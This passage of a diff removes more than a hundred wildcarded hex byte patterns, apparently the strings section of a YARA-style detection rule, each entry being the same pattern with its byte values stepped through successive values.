-		$s014 = { 0E 0F 0E 0F 0E 0C ?? ?? 0E 0C 0E 0F 0E 0C ?? ?? 0E 0D 0E 0C 0E 0A ?? ?? ?? ?? 0E 0A 0E 0C 0E 0A ?? ?? ?? ?? 0E 0B 0E 0F 0E 0C ?? ?? }
-		$s015 = { 0F 0E 0F 0E 0F 0D ?? ?? 0F 0D 0F 0E 0F 0D ?? ?? 0F 0C 0F 0D 0F 0B ?? ?? ?? ?? 0F 0B 0F 0D 0F 0B ?? ?? ?? ?? 0F 0A 0F 0E 0F 0D ?? ?? }
-		$s016 = { 10 11 10 11 10 12 ?? ?? 10 12 10 11 10 12 ?? ?? 10 13 10 12 10 14 ?? ?? ?? ?? 10 14 10 12 10 14 ?? ?? ?? ?? 10 15 10 11 10 12 ?? ?? }
-		$s017 = { 11 10 11 10 11 13 ?? ?? 11 13 11 10 11 13 ?? ?? 11 12 11 13 11 15 ?? ?? ?? ?? 11 15 11 13 11 15 ?? ?? ?? ?? 11 14 11 10 11 13 ?? ?? }
-		$s018 = { 12 13 12 13 12 10 ?? ?? 12 10 12 13 12 10 ?? ?? 12 11 12 10 12 16 ?? ?? ?? ?? 12 16 12 10 12 16 ?? ?? ?? ?? 12 17 12 13 12 10 ?? ?? }
-		$s019 = { 13 12 13 12 13 11 ?? ?? 13 11 13 12 13 11 ?? ?? 13 10 13 11 13 17 ?? ?? ?? ?? 13 17 13 11 13 17 ?? ?? ?? ?? 13 16 13 12 13 11 ?? ?? }
-		$s020 = { 14 15 14 15 14 16 ?? ?? 14 16 14 15 14 16 ?? ?? 14 17 14 16 14 10 ?? ?? ?? ?? 14 10 14 16 14 10 ?? ?? ?? ?? 14 11 14 15 14 16 ?? ?? }
-		$s021 = { 15 14 15 14 15 17 ?? ?? 15 17 15 14 15 17 ?? ?? 15 16 15 17 15 11 ?? ?? ?? ?? 15 11 15 17 15 11 ?? ?? ?? ?? 15 10 15 14 15 17 ?? ?? }
-		$s022 = { 16 17 16 17 16 14 ?? ?? 16 14 16 17 16 14 ?? ?? 16 15 16 14 16 12 ?? ?? ?? ?? 16 12 16 14 16 12 ?? ?? ?? ?? 16 13 16 17 16 14 ?? ?? }
-		$s023 = { 17 16 17 16 17 15 ?? ?? 17 15 17 16 17 15 ?? ?? 17 14 17 15 17 13 ?? ?? ?? ?? 17 13 17 15 17 13 ?? ?? ?? ?? 17 12 17 16 17 15 ?? ?? }
-		$s024 = { 18 19 18 19 18 1A ?? ?? 18 1A 18 19 18 1A ?? ?? 18 1B 18 1A 18 1C ?? ?? ?? ?? 18 1C 18 1A 18 1C ?? ?? ?? ?? 18 1D 18 19 18 1A ?? ?? }
-		$s025 = { 19 18 19 18 19 1B ?? ?? 19 1B 19 18 19 1B ?? ?? 19 1A 19 1B 19 1D ?? ?? ?? ?? 19 1D 19 1B 19 1D ?? ?? ?? ?? 19 1C 19 18 19 1B ?? ?? }
-		$s026 = { 1A 1B 1A 1B 1A 18 ?? ?? 1A 18 1A 1B 1A 18 ?? ?? 1A 19 1A 18 1A 1E ?? ?? ?? ?? 1A 1E 1A 18 1A 1E ?? ?? ?? ?? 1A 1F 1A 1B 1A 18 ?? ?? }
-		$s027 = { 1B 1A 1B 1A 1B 19 ?? ?? 1B 19 1B 1A 1B 19 ?? ?? 1B 18 1B 19 1B 1F ?? ?? ?? ?? 1B 1F 1B 19 1B 1F ?? ?? ?? ?? 1B 1E 1B 1A 1B 19 ?? ?? }
-		$s028 = { 1C 1D 1C 1D 1C 1E ?? ?? 1C 1E 1C 1D 1C 1E ?? ?? 1C 1F 1C 1E 1C 18 ?? ?? ?? ?? 1C 18 1C 1E 1C 18 ?? ?? ?? ?? 1C 19 1C 1D 1C 1E ?? ?? }
-		$s029 = { 1D 1C 1D 1C 1D 1F ?? ?? 1D 1F 1D 1C 1D 1F ?? ?? 1D 1E 1D 1F 1D 19 ?? ?? ?? ?? 1D 19 1D 1F 1D 19 ?? ?? ?? ?? 1D 18 1D 1C 1D 1F ?? ?? }
-		$s030 = { 1E 1F 1E 1F 1E 1C ?? ?? 1E 1C 1E 1F 1E 1C ?? ?? 1E 1D 1E 1C 1E 1A ?? ?? ?? ?? 1E 1A 1E 1C 1E 1A ?? ?? ?? ?? 1E 1B 1E 1F 1E 1C ?? ?? }
-		$s031 = { 1F 1E 1F 1E 1F 1D ?? ?? 1F 1D 1F 1E 1F 1D ?? ?? 1F 1C 1F 1D 1F 1B ?? ?? ?? ?? 1F 1B 1F 1D 1F 1B ?? ?? ?? ?? 1F 1A 1F 1E 1F 1D ?? ?? }
-		$s032 = { 20 21 20 21 20 22 ?? ?? 20 22 20 21 20 22 ?? ?? 20 23 20 22 20 24 ?? ?? ?? ?? 20 24 20 22 20 24 ?? ?? ?? ?? 20 25 20 21 20 22 ?? ?? }
-		$s033 = { 21 20 21 20 21 23 ?? ?? 21 23 21 20 21 23 ?? ?? 21 22 21 23 21 25 ?? ?? ?? ?? 21 25 21 23 21 25 ?? ?? ?? ?? 21 24 21 20 21 23 ?? ?? }
-		$s034 = { 22 23 22 23 22 20 ?? ?? 22 20 22 23 22 20 ?? ?? 22 21 22 20 22 26 ?? ?? ?? ?? 22 26 22 20 22 26 ?? ?? ?? ?? 22 27 22 23 22 20 ?? ?? }
-		$s035 = { 23 22 23 22 23 21 ?? ?? 23 21 23 22 23 21 ?? ?? 23 20 23 21 23 27 ?? ?? ?? ?? 23 27 23 21 23 27 ?? ?? ?? ?? 23 26 23 22 23 21 ?? ?? }
-		$s036 = { 24 25 24 25 24 26 ?? ?? 24 26 24 25 24 26 ?? ?? 24 27 24 26 24 20 ?? ?? ?? ?? 24 20 24 26 24 20 ?? ?? ?? ?? 24 21 24 25 24 26 ?? ?? }
-		$s037 = { 25 24 25 24 25 27 ?? ?? 25 27 25 24 25 27 ?? ?? 25 26 25 27 25 21 ?? ?? ?? ?? 25 21 25 27 25 21 ?? ?? ?? ?? 25 20 25 24 25 27 ?? ?? }
-		$s038 = { 26 27 26 27 26 24 ?? ?? 26 24 26 27 26 24 ?? ?? 26 25 26 24 26 22 ?? ?? ?? ?? 26 22 26 24 26 22 ?? ?? ?? ?? 26 23 26 27 26 24 ?? ?? }
-		$s039 = { 27 26 27 26 27 25 ?? ?? 27 25 27 26 27 25 ?? ?? 27 24 27 25 27 23 ?? ?? ?? ?? 27 23 27 25 27 23 ?? ?? ?? ?? 27 22 27 26 27 25 ?? ?? }
-		$s040 = { 28 29 28 29 28 2A ?? ?? 28 2A 28 29 28 2A ?? ?? 28 2B 28 2A 28 2C ?? ?? ?? ?? 28 2C 28 2A 28 2C ?? ?? ?? ?? 28 2D 28 29 28 2A ?? ?? }
-		$s041 = { 29 28 29 28 29 2B ?? ?? 29 2B 29 28 29 2B ?? ?? 29 2A 29 2B 29 2D ?? ?? ?? ?? 29 2D 29 2B 29 2D ?? ?? ?? ?? 29 2C 29 28 29 2B ?? ?? }
-		$s042 = { 2A 2B 2A 2B 2A 28 ?? ?? 2A 28 2A 2B 2A 28 ?? ?? 2A 29 2A 28 2A 2E ?? ?? ?? ?? 2A 2E 2A 28 2A 2E ?? ?? ?? ?? 2A 2F 2A 2B 2A 28 ?? ?? }
-		$s043 = { 2B 2A 2B 2A 2B 29 ?? ?? 2B 29 2B 2A 2B 29 ?? ?? 2B 28 2B 29 2B 2F ?? ?? ?? ?? 2B 2F 2B 29 2B 2F ?? ?? ?? ?? 2B 2E 2B 2A 2B 29 ?? ?? }
-		$s044 = { 2C 2D 2C 2D 2C 2E ?? ?? 2C 2E 2C 2D 2C 2E ?? ?? 2C 2F 2C 2E 2C 28 ?? ?? ?? ?? 2C 28 2C 2E 2C 28 ?? ?? ?? ?? 2C 29 2C 2D 2C 2E ?? ?? }
-		$s045 = { 2D 2C 2D 2C 2D 2F ?? ?? 2D 2F 2D 2C 2D 2F ?? ?? 2D 2E 2D 2F 2D 29 ?? ?? ?? ?? 2D 29 2D 2F 2D 29 ?? ?? ?? ?? 2D 28 2D 2C 2D 2F ?? ?? }
-		$s046 = { 2E 2F 2E 2F 2E 2C ?? ?? 2E 2C 2E 2F 2E 2C ?? ?? 2E 2D 2E 2C 2E 2A ?? ?? ?? ?? 2E 2A 2E 2C 2E 2A ?? ?? ?? ?? 2E 2B 2E 2F 2E 2C ?? ?? }
-		$s047 = { 2F 2E 2F 2E 2F 2D ?? ?? 2F 2D 2F 2E 2F 2D ?? ?? 2F 2C 2F 2D 2F 2B ?? ?? ?? ?? 2F 2B 2F 2D 2F 2B ?? ?? ?? ?? 2F 2A 2F 2E 2F 2D ?? ?? }
-		$s048 = { 30 31 30 31 30 32 ?? ?? 30 32 30 31 30 32 ?? ?? 30 33 30 32 30 34 ?? ?? ?? ?? 30 34 30 32 30 34 ?? ?? ?? ?? 30 35 30 31 30 32 ?? ?? }
-		$s049 = { 31 30 31 30 31 33 ?? ?? 31 33 31 30 31 33 ?? ?? 31 32 31 33 31 35 ?? ?? ?? ?? 31 35 31 33 31 35 ?? ?? ?? ?? 31 34 31 30 31 33 ?? ?? }
-		$s050 = { 32 33 32 33 32 30 ?? ?? 32 30 32 33 32 30 ?? ?? 32 31 32 30 32 36 ?? ?? ?? ?? 32 36 32 30 32 36 ?? ?? ?? ?? 32 37 32 33 32 30 ?? ?? }
-		$s051 = { 33 32 33 32 33 31 ?? ?? 33 31 33 32 33 31 ?? ?? 33 30 33 31 33 37 ?? ?? ?? ?? 33 37 33 31 33 37 ?? ?? ?? ?? 33 36 33 32 33 31 ?? ?? }
-		$s052 = { 34 35 34 35 34 36 ?? ?? 34 36 34 35 34 36 ?? ?? 34 37 34 36 34 30 ?? ?? ?? ?? 34 30 34 36 34 30 ?? ?? ?? ?? 34 31 34 35 34 36 ?? ?? }
-		$s053 = { 35 34 35 34 35 37 ?? ?? 35 37 35 34 35 37 ?? ?? 35 36 35 37 35 31 ?? ?? ?? ?? 35 31 35 37 35 31 ?? ?? ?? ?? 35 30 35 34 35 37 ?? ?? }
-		$s054 = { 36 37 36 37 36 34 ?? ?? 36 34 36 37 36 34 ?? ?? 36 35 36 34 36 32 ?? ?? ?? ?? 36 32 36 34 36 32 ?? ?? ?? ?? 36 33 36 37 36 34 ?? ?? }
-		$s055 = { 37 36 37 36 37 35 ?? ?? 37 35 37 36 37 35 ?? ?? 37 34 37 35 37 33 ?? ?? ?? ?? 37 33 37 35 37 33 ?? ?? ?? ?? 37 32 37 36 37 35 ?? ?? }
-		$s056 = { 38 39 38 39 38 3A ?? ?? 38 3A 38 39 38 3A ?? ?? 38 3B 38 3A 38 3C ?? ?? ?? ?? 38 3C 38 3A 38 3C ?? ?? ?? ?? 38 3D 38 39 38 3A ?? ?? }
-		$s057 = { 39 38 39 38 39 3B ?? ?? 39 3B 39 38 39 3B ?? ?? 39 3A 39 3B 39 3D ?? ?? ?? ?? 39 3D 39 3B 39 3D ?? ?? ?? ?? 39 3C 39 38 39 3B ?? ?? }
-		$s058 = { 3A 3B 3A 3B 3A 38 ?? ?? 3A 38 3A 3B 3A 38 ?? ?? 3A 39 3A 38 3A 3E ?? ?? ?? ?? 3A 3E 3A 38 3A 3E ?? ?? ?? ?? 3A 3F 3A 3B 3A 38 ?? ?? }
-		$s059 = { 3B 3A 3B 3A 3B 39 ?? ?? 3B 39 3B 3A 3B 39 ?? ?? 3B 38 3B 39 3B 3F ?? ?? ?? ?? 3B 3F 3B 39 3B 3F ?? ?? ?? ?? 3B 3E 3B 3A 3B 39 ?? ?? }
-		$s060 = { 3C 3D 3C 3D 3C 3E ?? ?? 3C 3E 3C 3D 3C 3E ?? ?? 3C 3F 3C 3E 3C 38 ?? ?? ?? ?? 3C 38 3C 3E 3C 38 ?? ?? ?? ?? 3C 39 3C 3D 3C 3E ?? ?? }
-		$s061 = { 3D 3C 3D 3C 3D 3F ?? ?? 3D 3F 3D 3C 3D 3F ?? ?? 3D 3E 3D 3F 3D 39 ?? ?? ?? ?? 3D 39 3D 3F 3D 39 ?? ?? ?? ?? 3D 38 3D 3C 3D 3F ?? ?? }
-		$s062 = { 3E 3F 3E 3F 3E 3C ?? ?? 3E 3C 3E 3F 3E 3C ?? ?? 3E 3D 3E 3C 3E 3A ?? ?? ?? ?? 3E 3A 3E 3C 3E 3A ?? ?? ?? ?? 3E 3B 3E 3F 3E 3C ?? ?? }
-		$s063 = { 3F 3E 3F 3E 3F 3D ?? ?? 3F 3D 3F 3E 3F 3D ?? ?? 3F 3C 3F 3D 3F 3B ?? ?? ?? ?? 3F 3B 3F 3D 3F 3B ?? ?? ?? ?? 3F 3A 3F 3E 3F 3D ?? ?? }
-		$s064 = { 40 41 40 41 40 42 ?? ?? 40 42 40 41 40 42 ?? ?? 40 43 40 42 40 44 ?? ?? ?? ?? 40 44 40 42 40 44 ?? ?? ?? ?? 40 45 40 41 40 42 ?? ?? }
-		$s065 = { 41 40 41 40 41 43 ?? ?? 41 43 41 40 41 43 ?? ?? 41 42 41 43 41 45 ?? ?? ?? ?? 41 45 41 43 41 45 ?? ?? ?? ?? 41 44 41 40 41 43 ?? ?? }
-		$s066 = { 42 43 42 43 42 40 ?? ?? 42 40 42 43 42 40 ?? ?? 42 41 42 40 42 46 ?? ?? ?? ?? 42 46 42 40 42 46 ?? ?? ?? ?? 42 47 42 43 42 40 ?? ?? }
-		$s067 = { 43 42 43 42 43 41 ?? ?? 43 41 43 42 43 41 ?? ?? 43 40 43 41 43 47 ?? ?? ?? ?? 43 47 43 41 43 47 ?? ?? ?? ?? 43 46 43 42 43 41 ?? ?? }
-		$s068 = { 44 45 44 45 44 46 ?? ?? 44 46 44 45 44 46 ?? ?? 44 47 44 46 44 40 ?? ?? ?? ?? 44 40 44 46 44 40 ?? ?? ?? ?? 44 41 44 45 44 46 ?? ?? }
-		$s069 = { 45 44 45 44 45 47 ?? ?? 45 47 45 44 45 47 ?? ?? 45 46 45 47 45 41 ?? ?? ?? ?? 45 41 45 47 45 41 ?? ?? ?? ?? 45 40 45 44 45 47 ?? ?? }
-		$s070 = { 46 47 46 47 46 44 ?? ?? 46 44 46 47 46 44 ?? ?? 46 45 46 44 46 42 ?? ?? ?? ?? 46 42 46 44 46 42 ?? ?? ?? ?? 46 43 46 47 46 44 ?? ?? }
-		$s071 = { 47 46 47 46 47 45 ?? ?? 47 45 47 46 47 45 ?? ?? 47 44 47 45 47 43 ?? ?? ?? ?? 47 43 47 45 47 43 ?? ?? ?? ?? 47 42 47 46 47 45 ?? ?? }
-		$s072 = { 48 49 48 49 48 4A ?? ?? 48 4A 48 49 48 4A ?? ?? 48 4B 48 4A 48 4C ?? ?? ?? ?? 48 4C 48 4A 48 4C ?? ?? ?? ?? 48 4D 48 49 48 4A ?? ?? }
-		$s073 = { 49 48 49 48 49 4B ?? ?? 49 4B 49 48 49 4B ?? ?? 49 4A 49 4B 49 4D ?? ?? ?? ?? 49 4D 49 4B 49 4D ?? ?? ?? ?? 49 4C 49 48 49 4B ?? ?? }
-		$s074 = { 4A 4B 4A 4B 4A 48 ?? ?? 4A 48 4A 4B 4A 48 ?? ?? 4A 49 4A 48 4A 4E ?? ?? ?? ?? 4A 4E 4A 48 4A 4E ?? ?? ?? ?? 4A 4F 4A 4B 4A 48 ?? ?? }
-		$s075 = { 4B 4A 4B 4A 4B 49 ?? ?? 4B 49 4B 4A 4B 49 ?? ?? 4B 48 4B 49 4B 4F ?? ?? ?? ?? 4B 4F 4B 49 4B 4F ?? ?? ?? ?? 4B 4E 4B 4A 4B 49 ?? ?? }
-		$s076 = { 4C 4D 4C 4D 4C 4E ?? ?? 4C 4E 4C 4D 4C 4E ?? ?? 4C 4F 4C 4E 4C 48 ?? ?? ?? ?? 4C 48 4C 4E 4C 48 ?? ?? ?? ?? 4C 49 4C 4D 4C 4E ?? ?? }
-		$s077 = { 4D 4C 4D 4C 4D 4F ?? ?? 4D 4F 4D 4C 4D 4F ?? ?? 4D 4E 4D 4F 4D 49 ?? ?? ?? ?? 4D 49 4D 4F 4D 49 ?? ?? ?? ?? 4D 48 4D 4C 4D 4F ?? ?? }
-		$s078 = { 4E 4F 4E 4F 4E 4C ?? ?? 4E 4C 4E 4F 4E 4C ?? ?? 4E 4D 4E 4C 4E 4A ?? ?? ?? ?? 4E 4A 4E 4C 4E 4A ?? ?? ?? ?? 4E 4B 4E 4F 4E 4C ?? ?? }
-		$s079 = { 4F 4E 4F 4E 4F 4D ?? ?? 4F 4D 4F 4E 4F 4D ?? ?? 4F 4C 4F 4D 4F 4B ?? ?? ?? ?? 4F 4B 4F 4D 4F 4B ?? ?? ?? ?? 4F 4A 4F 4E 4F 4D ?? ?? }
-		$s080 = { 50 51 50 51 50 52 ?? ?? 50 52 50 51 50 52 ?? ?? 50 53 50 52 50 54 ?? ?? ?? ?? 50 54 50 52 50 54 ?? ?? ?? ?? 50 55 50 51 50 52 ?? ?? }
-		$s081 = { 51 50 51 50 51 53 ?? ?? 51 53 51 50 51 53 ?? ?? 51 52 51 53 51 55 ?? ?? ?? ?? 51 55 51 53 51 55 ?? ?? ?? ?? 51 54 51 50 51 53 ?? ?? }
-		$s082 = { 52 53 52 53 52 50 ?? ?? 52 50 52 53 52 50 ?? ?? 52 51 52 50 52 56 ?? ?? ?? ?? 52 56 52 50 52 56 ?? ?? ?? ?? 52 57 52 53 52 50 ?? ?? }
-		$s083 = { 53 52 53 52 53 51 ?? ?? 53 51 53 52 53 51 ?? ?? 53 50 53 51 53 57 ?? ?? ?? ?? 53 57 53 51 53 57 ?? ?? ?? ?? 53 56 53 52 53 51 ?? ?? }
-		$s084 = { 54 55 54 55 54 56 ?? ?? 54 56 54 55 54 56 ?? ?? 54 57 54 56 54 50 ?? ?? ?? ?? 54 50 54 56 54 50 ?? ?? ?? ?? 54 51 54 55 54 56 ?? ?? }
-		$s085 = { 55 54 55 54 55 57 ?? ?? 55 57 55 54 55 57 ?? ?? 55 56 55 57 55 51 ?? ?? ?? ?? 55 51 55 57 55 51 ?? ?? ?? ?? 55 50 55 54 55 57 ?? ?? }
-		$s086 = { 56 57 56 57 56 54 ?? ?? 56 54 56 57 56 54 ?? ?? 56 55 56 54 56 52 ?? ?? ?? ?? 56 52 56 54 56 52 ?? ?? ?? ?? 56 53 56 57 56 54 ?? ?? }
-		$s087 = { 57 56 57 56 57 55 ?? ?? 57 55 57 56 57 55 ?? ?? 57 54 57 55 57 53 ?? ?? ?? ?? 57 53 57 55 57 53 ?? ?? ?? ?? 57 52 57 56 57 55 ?? ?? }
-		$s088 = { 58 59 58 59 58 5A ?? ?? 58 5A 58 59 58 5A ?? ?? 58 5B 58 5A 58 5C ?? ?? ?? ?? 58 5C 58 5A 58 5C ?? ?? ?? ?? 58 5D 58 59 58 5A ?? ?? }
-		$s089 = { 59 58 59 58 59 5B ?? ?? 59 5B 59 58 59 5B ?? ?? 59 5A 59 5B 59 5D ?? ?? ?? ?? 59 5D 59 5B 59 5D ?? ?? ?? ?? 59 5C 59 58 59 5B ?? ?? }
-		$s090 = { 5A 5B 5A 5B 5A 58 ?? ?? 5A 58 5A 5B 5A 58 ?? ?? 5A 59 5A 58 5A 5E ?? ?? ?? ?? 5A 5E 5A 58 5A 5E ?? ?? ?? ?? 5A 5F 5A 5B 5A 58 ?? ?? }
-		$s091 = { 5B 5A 5B 5A 5B 59 ?? ?? 5B 59 5B 5A 5B 59 ?? ?? 5B 58 5B 59 5B 5F ?? ?? ?? ?? 5B 5F 5B 59 5B 5F ?? ?? ?? ?? 5B 5E 5B 5A 5B 59 ?? ?? }
-		$s092 = { 5C 5D 5C 5D 5C 5E ?? ?? 5C 5E 5C 5D 5C 5E ?? ?? 5C 5F 5C 5E 5C 58 ?? ?? ?? ?? 5C 58 5C 5E 5C 58 ?? ?? ?? ?? 5C 59 5C 5D 5C 5E ?? ?? }
-		$s093 = { 5D 5C 5D 5C 5D 5F ?? ?? 5D 5F 5D 5C 5D 5F ?? ?? 5D 5E 5D 5F 5D 59 ?? ?? ?? ?? 5D 59 5D 5F 5D 59 ?? ?? ?? ?? 5D 58 5D 5C 5D 5F ?? ?? }
-		$s094 = { 5E 5F 5E 5F 5E 5C ?? ?? 5E 5C 5E 5F 5E 5C ?? ?? 5E 5D 5E 5C 5E 5A ?? ?? ?? ?? 5E 5A 5E 5C 5E 5A ?? ?? ?? ?? 5E 5B 5E 5F 5E 5C ?? ?? }
-		$s095 = { 5F 5E 5F 5E 5F 5D ?? ?? 5F 5D 5F 5E 5F 5D ?? ?? 5F 5C 5F 5D 5F 5B ?? ?? ?? ?? 5F 5B 5F 5D 5F 5B ?? ?? ?? ?? 5F 5A 5F 5E 5F 5D ?? ?? }
-		$s096 = { 60 61 60 61 60 62 ?? ?? 60 62 60 61 60 62 ?? ?? 60 63 60 62 60 64 ?? ?? ?? ?? 60 64 60 62 60 64 ?? ?? ?? ?? 60 65 60 61 60 62 ?? ?? }
-		$s097 = { 61 60 61 60 61 63 ?? ?? 61 63 61 60 61 63 ?? ?? 61 62 61 63 61 65 ?? ?? ?? ?? 61 65 61 63 61 65 ?? ?? ?? ?? 61 64 61 60 61 63 ?? ?? }
-		$s098 = { 62 63 62 63 62 60 ?? ?? 62 60 62 63 62 60 ?? ?? 62 61 62 60 62 66 ?? ?? ?? ?? 62 66 62 60 62 66 ?? ?? ?? ?? 62 67 62 63 62 60 ?? ?? }
-		$s099 = { 63 62 63 62 63 61 ?? ?? 63 61 63 62 63 61 ?? ?? 63 60 63 61 63 67 ?? ?? ?? ?? 63 67 63 61 63 67 ?? ?? ?? ?? 63 66 63 62 63 61 ?? ?? }
-		$s100 = { 64 65 64 65 64 66 ?? ?? 64 66 64 65 64 66 ?? ?? 64 67 64 66 64 60 ?? ?? ?? ?? 64 60 64 66 64 60 ?? ?? ?? ?? 64 61 64 65 64 66 ?? ?? }
-		$s101 = { 65 64 65 64 65 67 ?? ?? 65 67 65 64 65 67 ?? ?? 65 66 65 67 65 61 ?? ?? ?? ?? 65 61 65 67 65 61 ?? ?? ?? ?? 65 60 65 64 65 67 ?? ?? }
-		$s102 = { 66 67 66 67 66 64 ?? ?? 66 64 66 67 66 64 ?? ?? 66 65 66 64 66 62 ?? ?? ?? ?? 66 62 66 64 66 62 ?? ?? ?? ?? 66 63 66 67 66 64 ?? ?? }
-		$s103 = { 67 66 67 66 67 65 ?? ?? 67 65 67 66 67 65 ?? ?? 67 64 67 65 67 63 ?? ?? ?? ?? 67 63 67 65 67 63 ?? ?? ?? ?? 67 62 67 66 67 65 ?? ?? }
-		$s104 = { 68 69 68 69 68 6A ?? ?? 68 6A 68 69 68 6A ?? ?? 68 6B 68 6A 68 6C ?? ?? ?? ?? 68 6C 68 6A 68 6C ?? ?? ?? ?? 68 6D 68 69 68 6A ?? ?? }
-		$s105 = { 69 68 69 68 69 6B ?? ?? 69 6B 69 68 69 6B ?? ?? 69 6A 69 6B 69 6D ?? ?? ?? ?? 69 6D 69 6B 69 6D ?? ?? ?? ?? 69 6C 69 68 69 6B ?? ?? }
-		$s106 = { 6A 6B 6A 6B 6A 68 ?? ?? 6A 68 6A 6B 6A 68 ?? ?? 6A 69 6A 68 6A 6E ?? ?? ?? ?? 6A 6E 6A 68 6A 6E ?? ?? ?? ?? 6A 6F 6A 6B 6A 68 ?? ?? }
-		$s107 = { 6B 6A 6B 6A 6B 69 ?? ?? 6B 69 6B 6A 6B 69 ?? ?? 6B 68 6B 69 6B 6F ?? ?? ?? ?? 6B 6F 6B 69 6B 6F ?? ?? ?? ?? 6B 6E 6B 6A 6B 69 ?? ?? }
-		$s108 = { 6C 6D 6C 6D 6C 6E ?? ?? 6C 6E 6C 6D 6C 6E ?? ?? 6C 6F 6C 6E 6C 68 ?? ?? ?? ?? 6C 68 6C 6E 6C 68 ?? ?? ?? ?? 6C 69 6C 6D 6C 6E ?? ?? }
-		$s109 = { 6D 6C 6D 6C 6D 6F ?? ?? 6D 6F 6D 6C 6D 6F ?? ?? 6D 6E 6D 6F 6D 69 ?? ?? ?? ?? 6D 69 6D 6F 6D 69 ?? ?? ?? ?? 6D 68 6D 6C 6D 6F ?? ?? }
-		$s110 = { 6E 6F 6E 6F 6E 6C ?? ?? 6E 6C 6E 6F 6E 6C ?? ?? 6E 6D 6E 6C 6E 6A ?? ?? ?? ?? 6E 6A 6E 6C 6E 6A ?? ?? ?? ?? 6E 6B 6E 6F 6E 6C ?? ?? }
-		$s111 = { 6F 6E 6F 6E 6F 6D ?? ?? 6F 6D 6F 6E 6F 6D ?? ?? 6F 6C 6F 6D 6F 6B ?? ?? ?? ?? 6F 6B 6F 6D 6F 6B ?? ?? ?? ?? 6F 6A 6F 6E 6F 6D ?? ?? }
-		$s112 = { 70 71 70 71 70 72 ?? ?? 70 72 70 71 70 72 ?? ?? 70 73 70 72 70 74 ?? ?? ?? ?? 70 74 70 72 70 74 ?? ?? ?? ?? 70 75 70 71 70 72 ?? ?? }
-		$s113 = { 71 70 71 70 71 73 ?? ?? 71 73 71 70 71 73 ?? ?? 71 72 71 73 71 75 ?? ?? ?? ?? 71 75 71 73 71 75 ?? ?? ?? ?? 71 74 71 70 71 73 ?? ?? }
-		$s114 = { 72 73 72 73 72 70 ?? ?? 72 70 72 73 72 70 ?? ?? 72 71 72 70 72 76 ?? ?? ?? ?? 72 76 72 70 72 76 ?? ?? ?? ?? 72 77 72 73 72 70 ?? ?? }
-		$s115 = { 73 72 73 72 73 71 ?? ?? 73 71 73 72 73 71 ?? ?? 73 70 73 71 73 77 ?? ?? ?? ?? 73 77 73 71 73 77 ?? ?? ?? ?? 73 76 73 72 73 71 ?? ?? }
-		$s116 = { 74 75 74 75 74 76 ?? ?? 74 76 74 75 74 76 ?? ?? 74 77 74 76 74 70 ?? ?? ?? ?? 74 70 74 76 74 70 ?? ?? ?? ?? 74 71 74 75 74 76 ?? ?? }
-		$s117 = { 75 74 75 74 75 77 ?? ?? 75 77 75 74 75 77 ?? ?? 75 76 75 77 75 71 ?? ?? ?? ?? 75 71 75 77 75 71 ?? ?? ?? ?? 75 70 75 74 75 77 ?? ?? }
-		$s118 = { 76 77 76 77 76 74 ?? ?? 76 74 76 77 76 74 ?? ?? 76 75 76 74 76 72 ?? ?? ?? ?? 76 72 76 74 76 72 ?? ?? ?? ?? 76 73 76 77 76 74 ?? ?? }
-		$s119 = { 77 76 77 76 77 75 ?? ?? 77 75 77 76 77 75 ?? ?? 77 74 77 75 77 73 ?? ?? ?? ?? 77 73 77 75 77 73 ?? ?? ?? ?? 77 72 77 76 77 75 ?? ?? }
-		$s120 = { 78 79 78 79 78 7A ?? ?? 78 7A 78 79 78 7A ?? ?? 78 7B 78 7A 78 7C ?? ?? ?? ?? 78 7C 78 7A 78 7C ?? ?? ?? ?? 78 7D 78 79 78 7A ?? ?? }
-		$s121 = { 79 78 79 78 79 7B ?? ?? 79 7B 79 78 79 7B ?? ?? 79 7A 79 7B 79 7D ?? ?? ?? ?? 79 7D 79 7B 79 7D ?? ?? ?? ?? 79 7C 79 78 79 7B ?? ?? }
-		$s122 = { 7A 7B 7A 7B 7A 78 ?? ?? 7A 78 7A 7B 7A 78 ?? ?? 7A 79 7A 78 7A 7E ?? ?? ?? ?? 7A 7E 7A 78 7A 7E ?? ?? ?? ?? 7A 7F 7A 7B 7A 78 ?? ?? }
-		$s123 = { 7B 7A 7B 7A 7B 79 ?? ?? 7B 79 7B 7A 7B 79 ?? ?? 7B 78 7B 79 7B 7F ?? ?? ?? ?? 7B 7F 7B 79 7B 7F ?? ?? ?? ?? 7B 7E 7B 7A 7B 79 ?? ?? }
-		$s124 = { 7C 7D 7C 7D 7C 7E ?? ?? 7C 7E 7C 7D 7C 7E ?? ?? 7C 7F 7C 7E 7C 78 ?? ?? ?? ?? 7C 78 7C 7E 7C 78 ?? ?? ?? ?? 7C 79 7C 7D 7C 7E ?? ?? }
-		$s125 = { 7D 7C 7D 7C 7D 7F ?? ?? 7D 7F 7D 7C 7D 7F ?? ?? 7D 7E 7D 7F 7D 79 ?? ?? ?? ?? 7D 79 7D 7F 7D 79 ?? ?? ?? ?? 7D 78 7D 7C 7D 7F ?? ?? }
-		$s126 = { 7E 7F 7E 7F 7E 7C ?? ?? 7E 7C 7E 7F 7E 7C ?? ?? 7E 7D 7E 7C 7E 7A ?? ?? ?? ?? 7E 7A 7E 7C 7E 7A ?? ?? ?? ?? 7E 7B 7E 7F 7E 7C ?? ?? }
-		$s127 = { 7F 7E 7F 7E 7F 7D ?? ?? 7F 7D 7F 7E 7F 7D ?? ?? 7F 7C 7F 7D 7F 7B ?? ?? ?? ?? 7F 7B 7F 7D 7F 7B ?? ?? ?? ?? 7F 7A 7F 7E 7F 7D ?? ?? }
-		$s128 = { 80 81 80 81 80 82 ?? ?? 80 82 80 81 80 82 ?? ?? 80 83 80 82 80 84 ?? ?? ?? ?? 80 84 80 82 80 84 ?? ?? ?? ?? 80 85 80 81 80 82 ?? ?? }
-		$s129 = { 81 80 81 80 81 83 ?? ?? 81 83 81 80 81 83 ?? ?? 81 82 81 83 81 85 ?? ?? ?? ?? 81 85 81 83 81 85 ?? ?? ?? ?? 81 84 81 80 81 83 ?? ?? }
-		$s130 = { 82 83 82 83 82 80 ?? ?? 82 80 82 83 82 80 ?? ?? 82 81 82 80 82 86 ?? ?? ?? ?? 82 86 82 80 82 86 ?? ?? ?? ?? 82 87 82 83 82 80 ?? ?? }
-		$s131 = { 83 82 83 82 83 81 ?? ?? 83 81 83 82 83 81 ?? ?? 83 80 83 81 83 87 ?? ?? ?? ?? 83 87 83 81 83 87 ?? ?? ?? ?? 83 86 83 82 83 81 ?? ?? }
